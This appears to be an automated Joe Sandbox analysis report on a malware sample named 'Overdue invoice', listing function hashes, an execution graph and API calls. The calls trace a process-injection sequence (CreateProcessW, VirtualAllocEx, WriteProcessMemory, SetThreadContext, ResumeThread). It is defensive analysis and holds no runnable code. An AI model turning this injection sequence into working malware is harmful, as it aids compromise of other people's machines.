                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C64DE8 Relevance: .0, Instructions: 25COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7774e100f00d1ab26b023c6fbb949adbb77cde7272281dada1dc82f2debde9f9
                                                                          • Instruction ID: a867f566fb05972668fb1b077747863903ad480d6f52789d7d8edf09e8609d4f
                                                                          • Opcode Fuzzy Hash: 7774e100f00d1ab26b023c6fbb949adbb77cde7272281dada1dc82f2debde9f9
                                                                          • Instruction Fuzzy Hash: 89E04872E001199F8B90EFBD98445AF7BF9EE8C221B004576E60DD3300EB704A118BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C68303 Relevance: .0, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 401ef50ac7d2d656bf1677270ba0b84bfa5a1b3c16b3fe2685954722f9378cc2
                                                                          • Instruction ID: ba91147be0af3a2ba91b071c0ff76ee9d7fefe5b38a3ac54d4e2fdcdd48ec061
                                                                          • Opcode Fuzzy Hash: 401ef50ac7d2d656bf1677270ba0b84bfa5a1b3c16b3fe2685954722f9378cc2
                                                                          • Instruction Fuzzy Hash: 4EE01A70E013099F8B90EEBAA8446DEBBF8EA44351F40003AE608D3200E73096028BE5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C682FF Relevance: .0, Instructions: 23COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1f0499df798d5df305aebb1e6a79664e17b1d36aadf3a8a3bc8df60fb9cd39f8
                                                                          • Instruction ID: 881ef42c677b5c8e336d5bde842168bd4a4b728bef4fa71e9ab712a3f5d9146f
                                                                          • Opcode Fuzzy Hash: 1f0499df798d5df305aebb1e6a79664e17b1d36aadf3a8a3bc8df60fb9cd39f8
                                                                          • Instruction Fuzzy Hash: E3E01A70E012058F8B80EFBAA84559E7AF8FA44251F40003AE608D3200E33086018BE4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65E88 Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f02d885cd52249965cd62695adcfe6d81f432e48af2a59e75db9a8332b10499d
                                                                          • Instruction ID: 360497bf6b36eb213fc9d1f3dbeff5254051bfec7213f7ee9c05bfc8947f3e24
                                                                          • Opcode Fuzzy Hash: f02d885cd52249965cd62695adcfe6d81f432e48af2a59e75db9a8332b10499d
                                                                          • Instruction Fuzzy Hash: 74E0ED70D00319DFCB90EFB9854525FBBF4AB04204FA0496AD514E2340D77846408FD5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65F38 Relevance: .0, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 16d1af69b4bd05e60379fa5d82d81f3919146bec929ebd5ff937e0bace1d1754
                                                                          • Instruction ID: 03819eeb0996d7ee08a42438a8821223c9bc781deb8cdeb1bebde9461f1e204b
                                                                          • Opcode Fuzzy Hash: 16d1af69b4bd05e60379fa5d82d81f3919146bec929ebd5ff937e0bace1d1754
                                                                          • Instruction Fuzzy Hash: 34D02E32320061078380B76CACC079EA3CADBC6B90B12856CFA06CB388DF209C4183E4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C6A35C Relevance: .0, Instructions: 18COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa646c719dff50e88c6341f421dbc3ba6786295389177e318f4a348d688128e5
                                                                          • Instruction ID: 299a012967ff7aed96214c33da466b593683bb9a314b7d05dc3dcb959dff9a17
                                                                          • Opcode Fuzzy Hash: aa646c719dff50e88c6341f421dbc3ba6786295389177e318f4a348d688128e5
                                                                          • Instruction Fuzzy Hash: 97D012107242169A5F8456F7255017E10CA1A8019AB954C7AA957EF2E5FE1CCA81327A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C67EC8 Relevance: .0, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 84978a394f03d7bd768da13cc393a58ade2f7543d0bfa1fd6f8fe0593abebdb6
                                                                          • Instruction ID: adad44d557887076f907737dccd256ed43d445833ec7e7c72a8c4cfb4175dc95
                                                                          • Opcode Fuzzy Hash: 84978a394f03d7bd768da13cc393a58ade2f7543d0bfa1fd6f8fe0593abebdb6
                                                                          • Instruction Fuzzy Hash: EAD02236F14A348F4A69624EA0D04ED328DC7446353000419F80AC7700CF19FD0243D8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 06C65C7A Relevance: .0, Instructions: 13COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000007.00000002.526970656.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_7_2_6c60000_Overdue invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: eb96885f3d82ecbd99737fa89c4d8e983d87cbcee7993d9ec6b64300cf435be7
                                                                          • Instruction ID: 58140aa708f21008b6567bf2fc0a90a9f70722a2584a769f4e2bcdb0326cd119
                                                                          • Opcode Fuzzy Hash: eb96885f3d82ecbd99737fa89c4d8e983d87cbcee7993d9ec6b64300cf435be7
                                                                          • Instruction Fuzzy Hash: B8D0C93AA14104CBCB147BB0F8890DCB735EF8132AF5241B9D50696154CB3168108B50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Execution Graph

                                                                          Execution Coverage:12.8%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:173
                                                                          Total number of Limit Nodes:10
                                                                          execution_graph 19505 2c66260 19508 2c65344 19505->19508 19507 2c6626d 19509 2c6534f 19508->19509 19512 2c65394 19509->19512 19511 2c66345 19511->19507 19513 2c6539f 19512->19513 19516 2c653c4 19513->19516 19515 2c6682a 19515->19511 19517 2c653cf 19516->19517 19520 2c663e0 19517->19520 19519 2c66922 19519->19515 19521 2c663eb 19520->19521 19522 2c6707c 19521->19522 19524 2c6b155 19521->19524 19522->19519 19525 2c6b181 19524->19525 19526 2c6b1a5 19525->19526 19529 2c6b413 19525->19529 19533 2c6b418 19525->19533 19526->19522 19531 2c6b425 19529->19531 19530 2c6b45f 19530->19526 19531->19530 19537 2c69480 19531->19537 19535 2c6b425 19533->19535 19534 2c6b45f 19534->19526 19535->19534 19536 2c69480 2 API calls 19535->19536 19536->19534 19538 2c6948b 19537->19538 19540 2c6c158 19538->19540 19541 2c6b7a4 19538->19541 19540->19540 19542 2c6b7af 19541->19542 19543 2c663e0 2 API calls 19542->19543 19544 2c6c1c7 19542->19544 19543->19544 19548 2c6df47 19544->19548 19554 2c6df50 19544->19554 19545 2c6c200 19545->19540 19550 2c6df81 19548->19550 19551 2c6dfce 19548->19551 19549 2c6df8d 19549->19545 19550->19549 19560 2c6e293 19550->19560 19563 2c6e298 19550->19563 19551->19545 19556 2c6dfce 19554->19556 19557 2c6df81 19554->19557 19555 2c6df8d 19555->19545 19556->19545 19557->19555 19558 2c6e293 2 API calls 19557->19558 19559 2c6e298 2 API calls 19557->19559 19558->19556 19559->19556 19561 2c69530 LoadLibraryExW GetModuleHandleW 19560->19561 19562 2c6e2a1 19561->19562 19562->19551 19564 2c69530 LoadLibraryExW GetModuleHandleW 19563->19564 19565 2c6e2a1 19563->19565 19564->19565 19565->19551 19566 2c6bb60 DuplicateHandle 19567 2c6bbf6 19566->19567 19571 2c6b530 GetCurrentProcess 19572 2c6b5a3 19571->19572 19573 2c6b5aa GetCurrentThread 19571->19573 19572->19573 19574 2c6b5e7 GetCurrentProcess 19573->19574 19575 2c6b5e0 19573->19575 19576 2c6b61d 19574->19576 19575->19574 19577 2c6b645 GetCurrentThreadId 19576->19577 19578 2c6b676 19577->19578 19579 2c69030 19580 2c6903f 19579->19580 19583 2c69530 19579->19583 19591 2c6952f 19579->19591 19584 2c69543 19583->19584 19585 2c6955b 19584->19585 19599 2c697b0 19584->19599 19603 2c697b8 19584->19603 19585->19580 19586 2c69553 19586->19585 19587 2c69758 GetModuleHandleW 19586->19587 19588 2c69785 19587->19588 19588->19580 19592 2c69543 19591->19592 19593 2c6955b 19592->19593 19597 2c697b0 LoadLibraryExW 19592->19597 19598 2c697b8 LoadLibraryExW 19592->19598 19593->19580 19594 2c69553 19594->19593 19595 2c69758 GetModuleHandleW 19594->19595 19596 2c69785 19595->19596 19596->19580 19597->19594 19598->19594 19600 2c697cc 19599->19600 19602 2c697f1 19600->19602 19607 2c69180 19600->19607 19602->19586 19604 2c697cc 19603->19604 19605 2c697f1 19604->19605 19606 2c69180 LoadLibraryExW 19604->19606 19605->19586 19606->19605 19608 2c69998 LoadLibraryExW 19607->19608 19610 2c69a11 19608->19610 19610->19602 19611 4cf1938 19612 4cf1939 19611->19612 19613 4cf19fe 19612->19613 19622 4cf2b8a 19612->19622 19629 4cf26db 19612->19629 19633 4cf1f7b 19612->19633 19637 4cf2340 19612->19637 19642 4cf2571 19612->19642 19646 4cf2653 19612->19646 19650 4cf2966 19612->19650 19654 4cf22b8 19612->19654 19623 4cf2b90 19622->19623 19658 4cf39db 19623->19658 19662 4cf39e0 19623->19662 19666 4cf3998 19623->19666 19670 4cf3988 19623->19670 19624 4cf2bac 19674 4cf35f0 19629->19674 19678 4cf35e8 19629->19678 19630 4cf26f3 19682 4cf3828 19633->19682 19686 4cf3820 19633->19686 19634 4cf1f93 19690 4cf322b 19637->19690 19695 4cf3280 19637->19695 19699 4cf3274 19637->19699 19644 4cf3828 WriteProcessMemory 19642->19644 19645 4cf3820 WriteProcessMemory 19642->19645 19643 4cf258b 19644->19643 19645->19643 19648 4cf3828 WriteProcessMemory 19646->19648 19649 4cf3820 WriteProcessMemory 19646->19649 19647 4cf2677 19648->19647 19649->19647 19703 4cf3778 19650->19703 19707 4cf3780 19650->19707 19651 4cf297b 19710 4cf36ab 19654->19710 19714 4cf36b0 19654->19714 19655 4cf22d0 19659 4cf39e0 ResumeThread 19658->19659 19661 4cf3a4e 19659->19661 19661->19624 19663 4cf3a0a ResumeThread 19662->19663 19665 4cf3a4e 19663->19665 19665->19624 19667 4cf39b2 19666->19667 19667->19624 19668 4cf3a21 ResumeThread 19667->19668 19669 4cf3a4e 19668->19669 19669->19624 19672 4cf398b 19670->19672 19671 4cf3a21 ResumeThread 19673 4cf3a4e 19671->19673 19672->19624 19672->19671 19673->19624 19675 4cf3638 SetThreadContext 19674->19675 19677 4cf366a 19675->19677 19677->19630 19679 4cf35eb SetThreadContext 19678->19679 19680 4cf366a 19678->19680 19679->19680 19680->19630 19683 4cf3873 WriteProcessMemory 19682->19683 19685 4cf38c4 19683->19685 19685->19634 19687 4cf3873 WriteProcessMemory 19686->19687 19689 4cf38c4 19687->19689 19689->19634 19691 4cf2360 19690->19691 19692 4cf3287 CreateProcessW 19690->19692 19694 4cf33e8 19692->19694 19696 4cf32ff CreateProcessW 19695->19696 19698 4cf33e8 19696->19698 19700 4cf3278 CreateProcessW 19699->19700 19702 4cf33e8 19700->19702 19704 4cf377b VirtualAllocEx 19703->19704 19705 4cf37fa 19703->19705 19704->19705 19705->19651 19708 4cf37c3 VirtualAllocEx 19707->19708 19709 4cf37fa 19708->19709 19709->19651 19711 4cf36b0 ReadProcessMemory 19710->19711 19713 4cf373e 19711->19713 19713->19655 19715 4cf36fb ReadProcessMemory 19714->19715 19716 4cf373e 19715->19716 19716->19655 19501 2c6fa58 19502 2c6fac0 CreateWindowExW 19501->19502 19504 2c6fb7c 19502->19504 19568 736bd58 19569 736bda0 VirtualProtect 19568->19569 19570 736bdda 19569->19570 19485 4cf3a80 19486 4cf3c0b 19485->19486 19487 4cf3aa6 19485->19487 19487->19486 19492 2c6fca0 SetWindowLongW 19487->19492 19494 2c6fc9b SetWindowLongW 19487->19494 19496 4cf3cfb 19487->19496 19499 4cf3d00 PostMessageW 19487->19499 19493 2c6fd0c 19492->19493 19493->19487 19495 2c6fd0c 19494->19495 19495->19487 19497 4cf3d00 PostMessageW 19496->19497 19498 4cf3d6c 19497->19498 19498->19487 19500 4cf3d6c 19499->19500 19500->19487

                                                                          Executed Functions

                                                                          Function 02C6B528 Relevance: 6.1, APIs: 4, Instructions: 121threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B590
                                                                          • GetCurrentThread.KERNEL32 ref: 02C6B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02C6B663
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 3af8af29c6fd1d8dcdc39edc6ac57bbd517341248b7477e5174e0f79a64407c1
                                                                          • Instruction ID: 4eb7ae9bd0249efe75d697cb9d7733f519810101f94942c492c858f8f5555036
                                                                          • Opcode Fuzzy Hash: 3af8af29c6fd1d8dcdc39edc6ac57bbd517341248b7477e5174e0f79a64407c1
                                                                          • Instruction Fuzzy Hash: E75155B0D006498FDB14DFAACA887EEBBF0EF88318F24855AE419B7350D7349944CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6B530 Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 105 2c6b530-2c6b5a1 GetCurrentProcess 106 2c6b5a3-2c6b5a9 105->106 107 2c6b5aa-2c6b5de GetCurrentThread 105->107 106->107 108 2c6b5e7-2c6b61b GetCurrentProcess 107->108 109 2c6b5e0-2c6b5e6 107->109 111 2c6b624-2c6b63c 108->111 112 2c6b61d-2c6b623 108->112 109->108 123 2c6b63f call 2c6b6eb 111->123 124 2c6b63f call 2c6bec8 111->124 125 2c6b63f call 2c6bed8 111->125 112->111 114 2c6b645-2c6b674 GetCurrentThreadId 116 2c6b676-2c6b67c 114->116 117 2c6b67d-2c6b6df 114->117 116->117 123->114 124->114 125->114
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B590
                                                                          • GetCurrentThread.KERNEL32 ref: 02C6B5CD
                                                                          • GetCurrentProcess.KERNEL32 ref: 02C6B60A
                                                                          • GetCurrentThreadId.KERNEL32 ref: 02C6B663
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 65b864f7578d8e092ae9034f06addb210d1a4f8b1fd9f35d15106b06e24f4302
                                                                          • Instruction ID: c96c814639feb039c1d653bceafe287eb94df8b21fc076d936f1e818f022f4f5
                                                                          • Opcode Fuzzy Hash: 65b864f7578d8e092ae9034f06addb210d1a4f8b1fd9f35d15106b06e24f4302
                                                                          • Instruction Fuzzy Hash: BE5156B0D006498FDB14DFAAC988BEEBBF0EF88318F24855AE409B7350D7349944CB65
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C69530 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 224 2c69530-2c69538 225 2c69543-2c69545 224->225 226 2c6953e call 2c6911c 224->226 227 2c69547 225->227 228 2c6955b-2c6955f 225->228 226->225 277 2c6954d call 2c697b0 227->277 278 2c6954d call 2c697b8 227->278 229 2c69573-2c695b4 228->229 230 2c69561-2c6956b 228->230 235 2c695b6-2c695be 229->235 236 2c695c1-2c695cf 229->236 230->229 231 2c69553-2c69555 231->228 234 2c69690-2c69750 231->234 272 2c69752-2c69755 234->272 273 2c69758-2c69783 GetModuleHandleW 234->273 235->236 238 2c695f3-2c695f5 236->238 239 2c695d1-2c695d6 236->239 242 2c695f8-2c695ff 238->242 240 2c695e1 239->240 241 2c695d8-2c695df call 2c69128 239->241 245 2c695e3-2c695f1 240->245 241->245 246 2c69601-2c69609 242->246 247 2c6960c-2c69613 242->247 245->242 246->247 249 2c69615-2c6961d 247->249 250 2c69620-2c69629 call 2c69138 247->250 249->250 254 2c69636-2c6963b 250->254 255 2c6962b-2c69633 250->255 257 2c6963d-2c69644 254->257 258 2c69659-2c6965d 254->258 255->254 257->258 259 2c69646-2c69656 call 2c69148 call 2c69158 257->259 279 2c69660 call 2c69ac0 258->279 280 2c69660 call 2c69abf 258->280 259->258 262 2c69663-2c69666 265 2c69668-2c69686 262->265 266 2c69689-2c6968f 262->266 265->266 272->273 274 2c69785-2c6978b 273->274 275 2c6978c-2c697a0 273->275 274->275 277->231 278->231 279->262 280->262
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 02C69776
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          • Opcode ID: 833ffce916baff2b1092c719b55460e95258d8f7332d18b3dce05631a6ded861
                                                                          • Instruction ID: 2f5f3378a0d01291ba683c7a6bda41a9e5e2d9db0987977b4c848e300c507c39
                                                                          • Opcode Fuzzy Hash: 833ffce916baff2b1092c719b55460e95258d8f7332d18b3dce05631a6ded861
                                                                          • Instruction Fuzzy Hash: 287148B0A00B058FDB64DF2AD4887AAB7F1FF88214F108A2DD45AD7A50D734E945CF91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF322B Relevance: 1.7, APIs: 1, Instructions: 158processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 281 4cf322b-4cf3235 282 4cf3287-4cf330b 281->282 283 4cf3237-4cf3250 281->283 287 4cf330d-4cf3313 282->287 288 4cf3316-4cf331d 282->288 284 4cf3257-4cf3268 283->284 285 4cf3252 283->285 285->284 287->288 290 4cf331f-4cf3325 288->290 291 4cf3328-4cf333e 288->291 290->291 292 4cf3349-4cf33e6 CreateProcessW 291->292 293 4cf3340-4cf3346 291->293 295 4cf33ef-4cf3463 292->295 296 4cf33e8-4cf33ee 292->296 293->292 304 4cf3475-4cf347c 295->304 305 4cf3465-4cf346b 295->305 296->295 306 4cf347e-4cf348d 304->306 307 4cf3493 304->307 305->304 306->307 309 4cf3494 307->309 309->309
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CF33D3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 798ff89752859e55a490ac6562ac22d85e02579411c9d08d187867993f4d755d
                                                                          • Instruction ID: f8032a2bde654364a64ee1b3b1bdfbeb8c24784815f08d71b11805a5f28339b0
                                                                          • Opcode Fuzzy Hash: 798ff89752859e55a490ac6562ac22d85e02579411c9d08d187867993f4d755d
                                                                          • Instruction Fuzzy Hash: D9611671D00368DFDB51CF99C880BDDBBB2AF49314F15819AE908A7260DB356A89CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3274 Relevance: 1.6, APIs: 1, Instructions: 150processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 310 4cf3274-4cf3276 311 4cf327d-4cf330b 310->311 312 4cf3278-4cf327b 310->312 315 4cf330d-4cf3313 311->315 316 4cf3316-4cf331d 311->316 312->311 315->316 317 4cf331f-4cf3325 316->317 318 4cf3328-4cf333e 316->318 317->318 319 4cf3349-4cf33e6 CreateProcessW 318->319 320 4cf3340-4cf3346 318->320 322 4cf33ef-4cf3463 319->322 323 4cf33e8-4cf33ee 319->323 320->319 331 4cf3475-4cf347c 322->331 332 4cf3465-4cf346b 322->332 323->322 333 4cf347e-4cf348d 331->333 334 4cf3493 331->334 332->331 333->334 336 4cf3494 334->336 336->336
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CF33D3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 39656b31146f06b641eab35ecfa88f99d19149a7c7eb89a0738fc8531888659d
                                                                          • Instruction ID: 59a65ac11aaf87d1805e5b7849be5ac73524b19db201eca16a181a47c3a6cbf9
                                                                          • Opcode Fuzzy Hash: 39656b31146f06b641eab35ecfa88f99d19149a7c7eb89a0738fc8531888659d
                                                                          • Instruction Fuzzy Hash: 7F513871900368EFDB50CF96C880BDDBBB6BF48314F158099E908B7250DB75AA89CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 04CF3280 Relevance: 1.6, APIs: 1, Instructions: 143processCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 337 4cf3280-4cf330b 339 4cf330d-4cf3313 337->339 340 4cf3316-4cf331d 337->340 339->340 341 4cf331f-4cf3325 340->341 342 4cf3328-4cf333e 340->342 341->342 343 4cf3349-4cf33e6 CreateProcessW 342->343 344 4cf3340-4cf3346 342->344 346 4cf33ef-4cf3463 343->346 347 4cf33e8-4cf33ee 343->347 344->343 355 4cf3475-4cf347c 346->355 356 4cf3465-4cf346b 346->356 347->346 357 4cf347e-4cf348d 355->357 358 4cf3493 355->358 356->355 357->358 360 4cf3494 358->360 360->360
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 04CF33D3
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.378693090.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_4cf0000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 581c13915410e9be28bf720232ab920930edb0fef53941d80607f32646a29ec3
                                                                          • Instruction ID: b549181ff0a7155b587987091f21a3a4aeb1a6f907db8aed0f0bf06d33a4109c
                                                                          • Opcode Fuzzy Hash: 581c13915410e9be28bf720232ab920930edb0fef53941d80607f32646a29ec3
                                                                          • Instruction Fuzzy Hash: DF510671900368DFDB50CF96C880BDDBBB2BF48314F15809AE908B7250DB75AA89CF61
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6F9EB Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 361 2c6f9eb-2c6f9f8 362 2c6fa5a-2c6fabe 361->362 363 2c6f9fa 361->363 364 2c6fac0-2c6fac6 362->364 365 2c6fac9-2c6fad0 362->365 363->362 364->365 366 2c6fad2-2c6fad8 365->366 367 2c6fadb-2c6fb13 365->367 366->367 368 2c6fb1b-2c6fb7a CreateWindowExW 367->368 369 2c6fb83-2c6fbbb 368->369 370 2c6fb7c-2c6fb82 368->370 374 2c6fbbd-2c6fbc0 369->374 375 2c6fbc8 369->375 370->369 374->375 376 2c6fbc9 375->376 376->376
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C6FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 0e93ce7d0484893b2bdcfd39348129fa005c6f6a01cdd824e3c2fb06c11710c9
                                                                          • Instruction ID: 4876af1b2d6c1f2336dacc2750f60c03ecdaba825b7bbcd9a4197d73b26dee39
                                                                          • Opcode Fuzzy Hash: 0e93ce7d0484893b2bdcfd39348129fa005c6f6a01cdd824e3c2fb06c11710c9
                                                                          • Instruction Fuzzy Hash: 4051D2B1D003599FDB14CFAAD894ADEBFB1BF88314F24812AE419AB211D7709945CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 02C6FA50 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 377 2c6fa50-2c6fabe 380 2c6fac0-2c6fac6 377->380 381 2c6fac9-2c6fad0 377->381 380->381 382 2c6fad2-2c6fad8 381->382 383 2c6fadb-2c6fb13 381->383 382->383 384 2c6fb1b-2c6fb7a CreateWindowExW 383->384 385 2c6fb83-2c6fbbb 384->385 386 2c6fb7c-2c6fb82 384->386 390 2c6fbbd-2c6fbc0 385->390 391 2c6fbc8 385->391 386->385 390->391 392 2c6fbc9 391->392 392->392
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 02C6FB6A
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.373137415.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_2c60000_yqWDN.jbxd
                                                                          Similarity
